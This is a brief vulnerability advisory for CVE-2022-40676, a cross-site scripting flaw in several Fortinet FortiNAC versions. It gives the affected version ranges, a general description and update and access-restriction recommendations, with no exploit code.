CVE-2022-40676

Name of the Vulnerable Software and Affected Versions Fortinet FortiNAC versions 8.3.7, 8.5.0 through 8.5.4, 8.6.0 through 8.6.5, 8.7.0 through 8.7.6, 8.8.0 through 8.8.11, 9.1.0 through 9.1.8, 9.2.0 through 9.2.5, 9.4.0

Description The issue is related to an improper neutralization of input during web page generation, which can be exploited for cross-site scripting attacks. This allows a remote attacker to execute unauthorized code or commands via specially crafted HTTP requests.

Recommendations For Fortinet FortiNAC versions 8.3.7, 8.5.0 through 8.5.4, 8.6.0 through 8.6.5, 8.7.0 through 8.7.6, 8.8.0 through 8.8.11, 9.1.0 through 9.1.8, 9.2.0 through 9.2.5, 9.4.0, consider updating to a version that includes a fix for this issue as soon as it becomes available. As a temporary workaround, consider restricting access to the web interface of Fortinet FortiNAC to minimize the risk of exploitation. Avoid using specially crafted HTTP requests to the affected system until the issue is resolved.